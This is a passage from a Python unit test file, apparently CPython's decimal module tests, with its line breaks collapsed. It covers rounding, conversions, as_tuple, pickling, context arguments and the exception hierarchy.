= hashit(x) self.assertEqual(h1, h2) self.assertEqual(h1, h3) c.prec = 10000 x = 1100 ** 1248 self.assertEqual(hashit(Decimal(x)), hashit(x)) def test_min_and_max_methods(self): Decimal = self.decimal.Decimal d1 = Decimal('15.32') d2 = Decimal('28.5') l1 = 15 l2 = 28 #between Decimals self.assertIs(min(d1,d2), d1) self.assertIs(min(d2,d1), d1) self.assertIs(max(d1,d2), d2) self.assertIs(max(d2,d1), d2) #between Decimal and int self.assertIs(min(d1,l2), d1) self.assertIs(min(l2,d1), d1) self.assertIs(max(l1,d2), d2) self.assertIs(max(d2,l1), d2) def test_as_nonzero(self): Decimal = self.decimal.Decimal #as false self.assertFalse(Decimal(0)) #as true self.assertTrue(Decimal('0.372')) def test_tostring_methods(self): #Test str and repr methods. Decimal = self.decimal.Decimal d = Decimal('15.32') self.assertEqual(str(d), '15.32') # str self.assertEqual(repr(d), "Decimal('15.32')") # repr def test_tonum_methods(self): #Test float and int methods. Decimal = self.decimal.Decimal d1 = Decimal('66') d2 = Decimal('15.32') #int self.assertEqual(int(d1), 66) self.assertEqual(int(d2), 15) #float self.assertEqual(float(d1), 66) self.assertEqual(float(d2), 15.32) #floor test_pairs = [ ('123.00', 123), ('3.2', 3), ('3.54', 3), ('3.899', 3), ('-2.3', -3), ('-11.0', -11), ('0.0', 0), ('-0E3', 0), ('89891211712379812736.1', 89891211712379812736), ] for d, i in test_pairs: self.assertEqual(math.floor(Decimal(d)), i) self.assertRaises(ValueError, math.floor, Decimal('-NaN')) self.assertRaises(ValueError, math.floor, Decimal('sNaN')) self.assertRaises(ValueError, math.floor, Decimal('NaN123')) self.assertRaises(OverflowError, math.floor, Decimal('Inf')) self.assertRaises(OverflowError, math.floor, Decimal('-Inf')) #ceiling test_pairs = [ ('123.00', 123), ('3.2', 4), ('3.54', 4), ('3.899', 4), ('-2.3', -2), ('-11.0', -11), ('0.0', 0), ('-0E3', 0), ('89891211712379812736.1', 89891211712379812737), ] for d, i in test_pairs: self.assertEqual(math.ceil(Decimal(d)), i) self.assertRaises(ValueError, math.ceil, Decimal('-NaN')) self.assertRaises(ValueError, math.ceil, Decimal('sNaN')) self.assertRaises(ValueError, math.ceil, Decimal('NaN123')) self.assertRaises(OverflowError, math.ceil, Decimal('Inf')) self.assertRaises(OverflowError, math.ceil, Decimal('-Inf')) #round, single argument test_pairs = [ ('123.00', 123), ('3.2', 3), ('3.54', 4), ('3.899', 4), ('-2.3', -2), ('-11.0', -11), ('0.0', 0), ('-0E3', 0), ('-3.5', -4), ('-2.5', -2), ('-1.5', -2), ('-0.5', 0), ('0.5', 0), ('1.5', 2), ('2.5', 2), ('3.5', 4), ] for d, i in test_pairs: self.assertEqual(round(Decimal(d)), i) self.assertRaises(ValueError, round, Decimal('-NaN')) self.assertRaises(ValueError, round, Decimal('sNaN')) self.assertRaises(ValueError, round, Decimal('NaN123')) self.assertRaises(OverflowError, round, Decimal('Inf')) self.assertRaises(OverflowError, round, Decimal('-Inf')) #round, two arguments; this is essentially equivalent #to quantize, which is already extensively tested test_triples = [ ('123.456', -4, '0E+4'), ('123.456', -3, '0E+3'), ('123.456', -2, '1E+2'), ('123.456', -1, '1.2E+2'), ('123.456', 0, '123'), ('123.456', 1, '123.5'), ('123.456', 2, '123.46'), ('123.456', 3, '123.456'), ('123.456', 4, '123.4560'), ('123.455', 2, '123.46'), ('123.445', 2, '123.44'), ('Inf', 4, 'NaN'), ('-Inf', -23, 'NaN'), ('sNaN314', 3, 'NaN314'), ] for d, n, r in test_triples: self.assertEqual(str(round(Decimal(d), n)), r) def test_nan_to_float(self): # Test conversions of decimal NANs to float. # See http://bugs.python.org/issue15544 Decimal = self.decimal.Decimal for s in ('nan', 'nan1234', '-nan', '-nan2468'): f = float(Decimal(s)) self.assertTrue(math.isnan(f)) sign = math.copysign(1.0, f) self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0) def test_snan_to_float(self): Decimal = self.decimal.Decimal for s in ('snan', '-snan', 'snan1357', '-snan1234'): d = Decimal(s) self.assertRaises(ValueError, float, d) def test_eval_round_trip(self): Decimal = self.decimal.Decimal #with zero d = Decimal( (0, (0,), 0) ) self.assertEqual(d, eval(repr(d))) #int d = Decimal( (1, (4, 5), 0) ) self.assertEqual(d, eval(repr(d))) #float d = Decimal( (0, (4, 5, 3, 4), -2) ) self.assertEqual(d, eval(repr(d))) #weird d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) self.assertEqual(d, eval(repr(d))) def test_as_tuple(self): Decimal = self.decimal.Decimal #with zero d = Decimal(0) self.assertEqual(d.as_tuple(), (0, (0,), 0) ) #int d = Decimal(-45) self.assertEqual(d.as_tuple(), (1, (4, 5), 0) ) #complicated string d = Decimal("-4.34913534E-17") self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) # The '0' coefficient is implementation specific to decimal.py. # It has no meaning in the C-version and is ignored there. d = Decimal("Infinity") self.assertEqual(d.as_tuple(), (0, (0,), 'F') ) #leading zeros in coefficient should be stripped d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) ) self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) ) d = Decimal( (1, (0, 0, 0), 37) ) self.assertEqual(d.as_tuple(), (1, (0,), 37)) d = Decimal( (1, (), 37) ) self.assertEqual(d.as_tuple(), (1, (0,), 37)) #leading zeros in NaN diagnostic info should be stripped d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') ) self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') ) d = Decimal( (1, (0, 0, 0), 'N') ) self.assertEqual(d.as_tuple(), (1, (), 'N') ) d = Decimal( (1, (), 'n') ) self.assertEqual(d.as_tuple(), (1, (), 'n') ) # For infinities, decimal.py has always silently accepted any # coefficient tuple. d = Decimal( (0, (0,), 'F') ) self.assertEqual(d.as_tuple(), (0, (0,), 'F')) d = Decimal( (0, (4, 5, 3, 4), 'F') ) self.assertEqual(d.as_tuple(), (0, (0,), 'F')) d = Decimal( (1, (0, 2, 7, 1), 'F') ) self.assertEqual(d.as_tuple(), (1, (0,), 'F')) def test_as_integer_ratio(self): Decimal = self.decimal.Decimal # exceptional cases self.assertRaises(OverflowError, Decimal.as_integer_ratio, Decimal('inf')) self.assertRaises(OverflowError, Decimal.as_integer_ratio, Decimal('-inf')) self.assertRaises(ValueError, Decimal.as_integer_ratio, Decimal('-nan')) self.assertRaises(ValueError, Decimal.as_integer_ratio, Decimal('snan123')) for exp in range(-4, 2): for coeff in range(1000): for sign in '+', '-': d = Decimal('%s%dE%d' % (sign, coeff, exp)) pq = d.as_integer_ratio() p, q = pq # check return type self.assertIsInstance(pq, tuple) self.assertIsInstance(p, int) self.assertIsInstance(q, int) # check normalization: q should be positive; # p should be relatively prime to q. self.assertGreater(q, 0) self.assertEqual(math.gcd(p, q), 1) # check that p/q actually gives the correct value self.assertEqual(Decimal(p) / Decimal(q), d) def test_subclassing(self): # Different behaviours when subclassing Decimal Decimal = self.decimal.Decimal class MyDecimal(Decimal): y = None d1 = MyDecimal(1) d2 = MyDecimal(2) d = d1 + d2 self.assertIs(type(d), Decimal) d = d1.max(d2) self.assertIs(type(d), Decimal) d = copy.copy(d1) self.assertIs(type(d), MyDecimal) self.assertEqual(d, d1) d = copy.deepcopy(d1) self.assertIs(type(d), MyDecimal) self.assertEqual(d, d1) # Decimal(Decimal) d = Decimal('1.0') x = Decimal(d) self.assertIs(type(x), Decimal) self.assertEqual(x, d) # MyDecimal(Decimal) m = MyDecimal(d) self.assertIs(type(m), MyDecimal) self.assertEqual(m, d) self.assertIs(m.y, None) # Decimal(MyDecimal) x = Decimal(m) self.assertIs(type(x), Decimal) self.assertEqual(x, d) # MyDecimal(MyDecimal) m.y = 9 x = MyDecimal(m) self.assertIs(type(x), MyDecimal) self.assertEqual(x, d) self.assertIs(x.y, None) def test_implicit_context(self): Decimal = self.decimal.Decimal getcontext = self.decimal.getcontext # Check results when context given implicitly. (Issue 2478) c = getcontext() self.assertEqual(str(Decimal(0).sqrt()), str(c.sqrt(Decimal(0)))) def test_none_args(self): Decimal = self.decimal.Decimal Context = self.decimal.Context localcontext = self.decimal.localcontext InvalidOperation = self.decimal.InvalidOperation DivisionByZero = self.decimal.DivisionByZero Overflow = self.decimal.Overflow Underflow = self.decimal.Underflow Subnormal = self.decimal.Subnormal Inexact = self.decimal.Inexact Rounded = self.decimal.Rounded Clamped = self.decimal.Clamped with localcontext(Context()) as c: c.prec = 7 c.Emax = 999 c.Emin = -999 x = Decimal("111") y = Decimal("1e9999") z = Decimal("1e-9999") ##### Unary functions c.clear_flags() self.assertEqual(str(x.exp(context=None)), '1.609487E+48') self.assertTrue(c.flags[Inexact]) self.assertTrue(c.flags[Rounded]) c.clear_flags() self.assertRaises(Overflow, y.exp, context=None) self.assertTrue(c.flags[Overflow]) self.assertIs(z.is_normal(context=None), False) self.assertIs(z.is_subnormal(context=None), True) c.clear_flags() self.assertEqual(str(x.ln(context=None)), '4.709530') self.assertTrue(c.flags[Inexact]) self.assertTrue(c.flags[Rounded]) c.clear_flags() self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(x.log10(context=None)), '2.045323') self.assertTrue(c.flags[Inexact]) self.assertTrue(c.flags[Rounded]) c.clear_flags() self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(x.logb(context=None)), '2') self.assertRaises(DivisionByZero, Decimal(0).logb, context=None) self.assertTrue(c.flags[DivisionByZero]) c.clear_flags() self.assertEqual(str(x.logical_invert(context=None)), '1111000') self.assertRaises(InvalidOperation, y.logical_invert, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999') self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(y.next_plus(context=None)), 'Infinity') self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() self.assertEqual(str(z.normalize(context=None)), '0') self.assertRaises(Overflow, y.normalize, context=None) self.assertTrue(c.flags[Overflow]) self.assertEqual(str(z.number_class(context=None)), '+Subnormal') c.clear_flags() self.assertEqual(str(z.sqrt(context=None)), '0E-1005') self.assertTrue(c.flags[Clamped]) self.assertTrue(c.flags[Inexact]) self.assertTrue(c.flags[Rounded]) self.assertTrue(c.flags[Subnormal]) self.assertTrue(c.flags[Underflow]) c.clear_flags() self.assertRaises(Overflow, y.sqrt, context=None) self.assertTrue(c.flags[Overflow]) c.capitals = 0 self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999') c.capitals = 1 ##### Binary functions c.clear_flags() ans = str(x.compare(Decimal('Nan891287828'), context=None)) self.assertEqual(ans, 'NaN1287828') self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.compare_signal(8224, context=None)) self.assertEqual(ans, '-1') self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.logical_and(101, context=None)) self.assertEqual(ans, '101') self.assertRaises(InvalidOperation, x.logical_and, 123, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.logical_or(101, context=None)) self.assertEqual(ans, '111') self.assertRaises(InvalidOperation, x.logical_or, 123, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.logical_xor(101, context=None)) self.assertEqual(ans, '10') self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.max(101, context=None)) self.assertEqual(ans, '111') self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.max_mag(101, context=None)) self.assertEqual(ans, '111') self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.min(101, context=None)) self.assertEqual(ans, '101') self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.min_mag(101, context=None)) self.assertEqual(ans, '101') self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.remainder_near(101, context=None)) self.assertEqual(ans, '10') self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.rotate(2, context=None)) self.assertEqual(ans, '11100') self.assertRaises(InvalidOperation, x.rotate, 101, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.scaleb(7, context=None)) self.assertEqual(ans, '1.11E+9') self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.shift(2, context=None)) self.assertEqual(ans, '11100') self.assertRaises(InvalidOperation, x.shift, 10000, context=None) self.assertTrue(c.flags[InvalidOperation]) ##### Ternary functions c.clear_flags() ans = str(x.fma(2, 3, context=None)) self.assertEqual(ans, '225') self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None) self.assertTrue(c.flags[Overflow]) ##### Special cases c.rounding = ROUND_HALF_EVEN ans = str(Decimal('1.5').to_integral(rounding=None, context=None)) self.assertEqual(ans, '2') c.rounding = ROUND_DOWN ans = str(Decimal('1.5').to_integral(rounding=None, context=None)) self.assertEqual(ans, '1') ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None)) self.assertEqual(ans, '2') c.clear_flags() self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None) self.assertTrue(c.flags[InvalidOperation]) c.rounding = ROUND_HALF_EVEN ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None)) self.assertEqual(ans, '2') c.rounding = ROUND_DOWN ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None)) self.assertEqual(ans, '1') ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None)) self.assertEqual(ans, '2') c.clear_flags() self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None) self.assertTrue(c.flags[InvalidOperation]) c.rounding = ROUND_HALF_EVEN ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None)) self.assertEqual(ans, '2') c.rounding = ROUND_DOWN ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None)) self.assertEqual(ans, '1') ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None)) self.assertEqual(ans, '2') c.clear_flags() self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None) self.assertTrue(c.flags[InvalidOperation]) c.rounding = ROUND_UP ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None)) self.assertEqual(ans, '1.501') c.rounding = ROUND_DOWN ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None)) self.assertEqual(ans, '1.500') ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None)) self.assertEqual(ans, '1.501') c.clear_flags() self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None) self.assertTrue(c.flags[InvalidOperation]) with localcontext(Context()) as context: context.prec = 7 context.Emax = 999 context.Emin = -999 with localcontext(ctx=None) as c: self.assertEqual(c.prec, 7) self.assertEqual(c.Emax, 999) self.assertEqual(c.Emin, -999) def test_conversions_from_int(self): # Check that methods taking a second Decimal argument will # always accept an integer in place of a Decimal. Decimal = self.decimal.Decimal self.assertEqual(Decimal(4).compare(3), Decimal(4).compare(Decimal(3))) self.assertEqual(Decimal(4).compare_signal(3), Decimal(4).compare_signal(Decimal(3))) self.assertEqual(Decimal(4).compare_total(3), Decimal(4).compare_total(Decimal(3))) self.assertEqual(Decimal(4).compare_total_mag(3), Decimal(4).compare_total_mag(Decimal(3))) self.assertEqual(Decimal(10101).logical_and(1001), Decimal(10101).logical_and(Decimal(1001))) self.assertEqual(Decimal(10101).logical_or(1001), Decimal(10101).logical_or(Decimal(1001))) self.assertEqual(Decimal(10101).logical_xor(1001), Decimal(10101).logical_xor(Decimal(1001))) self.assertEqual(Decimal(567).max(123), Decimal(567).max(Decimal(123))) self.assertEqual(Decimal(567).max_mag(123), Decimal(567).max_mag(Decimal(123))) self.assertEqual(Decimal(567).min(123), Decimal(567).min(Decimal(123))) self.assertEqual(Decimal(567).min_mag(123), Decimal(567).min_mag(Decimal(123))) self.assertEqual(Decimal(567).next_toward(123), Decimal(567).next_toward(Decimal(123))) self.assertEqual(Decimal(1234).quantize(100), Decimal(1234).quantize(Decimal(100))) self.assertEqual(Decimal(768).remainder_near(1234), Decimal(768).remainder_near(Decimal(1234))) self.assertEqual(Decimal(123).rotate(1), Decimal(123).rotate(Decimal(1))) self.assertEqual(Decimal(1234).same_quantum(1000), Decimal(1234).same_quantum(Decimal(1000))) self.assertEqual(Decimal('9.123').scaleb(-100), Decimal('9.123').scaleb(Decimal(-100))) self.assertEqual(Decimal(456).shift(-1), Decimal(456).shift(Decimal(-1))) self.assertEqual(Decimal(-12).fma(Decimal(45), 67), Decimal(-12).fma(Decimal(45), Decimal(67))) self.assertEqual(Decimal(-12).fma(45, 67), Decimal(-12).fma(Decimal(45), Decimal(67))) self.assertEqual(Decimal(-12).fma(45, Decimal(67)), Decimal(-12).fma(Decimal(45), Decimal(67))) class CUsabilityTest(UsabilityTest): decimal = C class PyUsabilityTest(UsabilityTest): decimal = P class PythonAPItests(unittest.TestCase): def test_abc(self): Decimal = self.decimal.Decimal self.assertTrue(issubclass(Decimal, numbers.Number)) self.assertFalse(issubclass(Decimal, numbers.Real)) self.assertIsInstance(Decimal(0), numbers.Number) self.assertNotIsInstance(Decimal(0), numbers.Real) def test_pickle(self): for proto in range(pickle.HIGHEST_PROTOCOL + 1): Decimal = self.decimal.Decimal savedecimal = sys.modules['decimal'] # Round trip sys.modules['decimal'] = self.decimal d = Decimal('-3.141590000') p = pickle.dumps(d, proto) e = pickle.loads(p) self.assertEqual(d, e) if C: # Test interchangeability x = C.Decimal('-3.123e81723') y = P.Decimal('-3.123e81723') sys.modules['decimal'] = C sx = pickle.dumps(x, proto) sys.modules['decimal'] = P r = pickle.loads(sx) self.assertIsInstance(r, P.Decimal) self.assertEqual(r, y) sys.modules['decimal'] = P sy = pickle.dumps(y, proto) sys.modules['decimal'] = C r = pickle.loads(sy) self.assertIsInstance(r, C.Decimal) self.assertEqual(r, x) x = C.Decimal('-3.123e81723').as_tuple() y = P.Decimal('-3.123e81723').as_tuple() sys.modules['decimal'] = C sx = pickle.dumps(x, proto) sys.modules['decimal'] = P r = pickle.loads(sx) self.assertIsInstance(r, P.DecimalTuple) self.assertEqual(r, y) sys.modules['decimal'] = P sy = pickle.dumps(y, proto) sys.modules['decimal'] = C r = pickle.loads(sy) self.assertIsInstance(r, C.DecimalTuple) self.assertEqual(r, x) sys.modules['decimal'] = savedecimal def test_int(self): Decimal = self.decimal.Decimal for x in range(-250, 250): s = '%0.2f' % (x / 100.0) # should work the same as for floats self.assertEqual(int(Decimal(s)), int(float(s))) # should work the same as to_integral in the ROUND_DOWN mode d = Decimal(s) r = d.to_integral(ROUND_DOWN) self.assertEqual(Decimal(int(d)), r) self.assertRaises(ValueError, int, Decimal('-nan')) self.assertRaises(ValueError, int, Decimal('snan')) self.assertRaises(OverflowError, int, Decimal('inf')) self.assertRaises(OverflowError, int, Decimal('-inf')) def test_trunc(self): Decimal = self.decimal.Decimal for x in range(-250, 250): s = '%0.2f' % (x / 100.0) # should work the same as for floats self.assertEqual(int(Decimal(s)), int(float(s))) # should work the same as to_integral in the ROUND_DOWN mode d = Decimal(s) r = d.to_integral(ROUND_DOWN) self.assertEqual(Decimal(math.trunc(d)), r) def test_from_float(self): Decimal = self.decimal.Decimal class MyDecimal(Decimal): def __init__(self, _): self.x = 'y' self.assertTrue(issubclass(MyDecimal, Decimal)) r = MyDecimal.from_float(0.1) self.assertEqual(type(r), MyDecimal) self.assertEqual(str(r), '0.1000000000000000055511151231257827021181583404541015625') self.assertEqual(r.x, 'y') bigint = 12345678901234567890123456789 self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint)) self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan()) self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite()) self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite()) self.assertEqual(str(MyDecimal.from_float(float('nan'))), str(Decimal('NaN'))) self.assertEqual(str(MyDecimal.from_float(float('inf'))), str(Decimal('Infinity'))) self.assertEqual(str(MyDecimal.from_float(float('-inf'))), str(Decimal('-Infinity'))) self.assertRaises(TypeError, MyDecimal.from_float, 'abc') for i in range(200): x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0) self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip def test_create_decimal_from_float(self): Decimal = self.decimal.Decimal Context = self.decimal.Context Inexact = self.decimal.Inexact context = Context(prec=5, rounding=ROUND_DOWN) self.assertEqual( context.create_decimal_from_float(math.pi), Decimal('3.1415') ) context = Context(prec=5, rounding=ROUND_UP) self.assertEqual( context.create_decimal_from_float(math.pi), Decimal('3.1416') ) context = Context(prec=5, traps=[Inexact]) self.assertRaises( Inexact, context.create_decimal_from_float, math.pi ) self.assertEqual(repr(context.create_decimal_from_float(-0.0)), "Decimal('-0')") self.assertEqual(repr(context.create_decimal_from_float(1.0)), "Decimal('1')") self.assertEqual(repr(context.create_decimal_from_float(10)), "Decimal('10')") def test_quantize(self): Decimal = self.decimal.Decimal Context = self.decimal.Context InvalidOperation = self.decimal.InvalidOperation c = Context(Emax=99999, Emin=-99999) self.assertEqual( Decimal('7.335').quantize(Decimal('.01')), Decimal('7.34') ) self.assertEqual( Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN), Decimal('7.33') ) self.assertRaises( InvalidOperation, Decimal("10e99999").quantize, Decimal('1e100000'), context=c ) c = Context() d = Decimal("0.871831e800") x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN) self.assertEqual(x, Decimal('8.71E+799')) def test_complex(self): Decimal = self.decimal.Decimal x = Decimal("9.8182731e181273") self.assertEqual(x.real, x) self.assertEqual(x.imag, 0) self.assertEqual(x.conjugate(), x) x = Decimal("1") self.assertEqual(complex(x), complex(float(1))) self.assertRaises(AttributeError, setattr, x, 'real', 100) self.assertRaises(AttributeError, setattr, x, 'imag', 100) self.assertRaises(AttributeError, setattr, x, 'conjugate', 100) self.assertRaises(AttributeError, setattr, x, '__complex__', 100) def test_named_parameters(self): D = self.decimal.Decimal Context = self.decimal.Context localcontext = self.decimal.localcontext InvalidOperation = self.decimal.InvalidOperation Overflow = self.decimal.Overflow xc = Context() xc.prec = 1 xc.Emax = 1 xc.Emin = -1 with localcontext() as c: c.clear_flags() self.assertEqual(D(9, xc), 9) self.assertEqual(D(9, context=xc), 9) self.assertEqual(D(context=xc, value=9), 9) self.assertEqual(D(context=xc), 0) xc.clear_flags() self.assertRaises(InvalidOperation, D, "xyz", context=xc) self.assertTrue(xc.flags[InvalidOperation]) self.assertFalse(c.flags[InvalidOperation]) xc.clear_flags() self.assertEqual(D(2).exp(context=xc), 7) self.assertRaises(Overflow, D(8).exp, context=xc) self.assertTrue(xc.flags[Overflow]) self.assertFalse(c.flags[Overflow]) xc.clear_flags() self.assertEqual(D(2).ln(context=xc), D('0.7')) self.assertRaises(InvalidOperation, D(-1).ln, context=xc) self.assertTrue(xc.flags[InvalidOperation]) self.assertFalse(c.flags[InvalidOperation]) self.assertEqual(D(0).log10(context=xc), D('-inf')) self.assertEqual(D(-1).next_minus(context=xc), -2) self.assertEqual(D(-1).next_plus(context=xc), D('-0.9')) self.assertEqual(D("9.73").normalize(context=xc), D('1E+1')) self.assertEqual(D("9999").to_integral(context=xc), 9999) self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000) self.assertEqual(D("123").to_integral_value(context=xc), 123) self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2')) self.assertEqual(D("0.0625").compare(context=xc, other=3), -1) xc.clear_flags() self.assertRaises(InvalidOperation, D("0").compare_signal, D('nan'), context=xc) self.assertTrue(xc.flags[InvalidOperation]) self.assertFalse(c.flags[InvalidOperation]) self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0')) self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0')) self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc), D('-0.3')) self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0')) self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc), D('0.0')) self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1')) xc.clear_flags() self.assertRaises(InvalidOperation, D("0.2").quantize, D('1e10'), context=xc) self.assertTrue(xc.flags[InvalidOperation]) self.assertFalse(c.flags[InvalidOperation]) self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc), D('-0.5')) self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7), D('7E+1')) self.assertRaises(TypeError, D(1).is_canonical, context=xc) self.assertRaises(TypeError, D(1).is_finite, context=xc) self.assertRaises(TypeError, D(1).is_infinite, context=xc) self.assertRaises(TypeError, D(1).is_nan, context=xc) self.assertRaises(TypeError, D(1).is_qnan, context=xc) self.assertRaises(TypeError, D(1).is_snan, context=xc) self.assertRaises(TypeError, D(1).is_signed, context=xc) self.assertRaises(TypeError, D(1).is_zero, context=xc) self.assertFalse(D("0.01").is_normal(context=xc)) self.assertTrue(D("0.01").is_subnormal(context=xc)) self.assertRaises(TypeError, D(1).adjusted, context=xc) self.assertRaises(TypeError, D(1).conjugate, context=xc) self.assertRaises(TypeError, D(1).radix, context=xc) self.assertEqual(D(-111).logb(context=xc), 2) self.assertEqual(D(0).logical_invert(context=xc), 1) self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal') self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21') self.assertEqual(D('11').logical_and(D('10'), context=xc), 0) self.assertEqual(D('11').logical_or(D('10'), context=xc), 1) self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1) self.assertEqual(D('23').rotate(1, context=xc), 3) self.assertEqual(D('23').rotate(1, context=xc), 3) xc.clear_flags() self.assertRaises(Overflow, D('23').scaleb, 1, context=xc) self.assertTrue(xc.flags[Overflow]) self.assertFalse(c.flags[Overflow]) self.assertEqual(D('23').shift(-1, context=xc), 0) self.assertRaises(TypeError, D.from_float, 1.1, context=xc) self.assertRaises(TypeError, D(0).as_tuple, context=xc) self.assertEqual(D(1).canonical(), 1) self.assertRaises(TypeError, D("-1").copy_abs, context=xc) self.assertRaises(TypeError, D("-1").copy_negate, context=xc) self.assertRaises(TypeError, D(1).canonical, context="x") self.assertRaises(TypeError, D(1).canonical, xyz="x") def test_exception_hierarchy(self): decimal = self.decimal DecimalException = decimal.DecimalException InvalidOperation = decimal.InvalidOperation FloatOperation = decimal.FloatOperation DivisionByZero = decimal.DivisionByZero Overflow = decimal.Overflow Underflow = decimal.Underflow Subnormal = decimal.Subnormal Inexact = decimal.Inexact Rounded = decimal.Rounded Clamped = decimal.Clamped self.assertTrue(issubclass(DecimalException, ArithmeticError)) self.assertTrue(issubclass(InvalidOperation, DecimalException)) self.assertTrue(issubclass(FloatOperation, DecimalException)) self.assertTrue(issubclass(FloatOperation, TypeError)) self.assertTrue(issubclass(DivisionByZero, DecimalException)) self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError)) self.assertTrue(issubclass(Overflow, Rounded)) self.assertTrue(issubclass(Overflow, Inexact)) self.assertTrue(issubclass(Overflow, DecimalException)) self.assertTrue(issubclass(Underflow, Inexact)) self.assertTrue(issubclass(Underflow, Rounded)) self.assertTrue(issubclass(Underflow, Subnormal)) self.assertTrue(issubclass(Underflow, DecimalException)) self.assertTrue(issubclass(Subnormal, DecimalException)) self.assertTrue(issubclass(Inexact, DecimalException)) self.assertTrue(issubclass(Rounded, DecimalException)) self.assertTrue(issubclass(Clamped, DecimalException)) self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation)) self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation)) self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation)) self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError)) self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation)) class CPythonAPItests(PythonAPItests): decimal = C class PyPythonAPItests(PythonAPItests): decimal = P class ContextAPItests(unittest.TestCase): def test_none_args(self): Context = self.decimal.Context InvalidOperation = self.decimal.InvalidOperation DivisionByZero = self.decimal.DivisionByZero Overflow = self.decimal.Overflow c1 = Context() c2 = Context(prec=None, rounding=None, Emax=None, Emin=None, capitals=None, clamp=None, flags=None, traps=None) for c in [c1, c2]: self.assertEqual(c.prec, 28) self.assertEqual(c.rounding, ROUND_HALF_EVEN) self.assertEqual(c.Emax, 999999) self.assertEqual(c.Emin, -999999) self.assertEqual(c.capitals, 1) self.assertEqual(c.clamp, 0) assert_signals(self, c, 'flags', []) assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero, Overflow]) @cpython_only def test_from_legacy_strings(self): import _testcapi c = self.decimal.Context() for 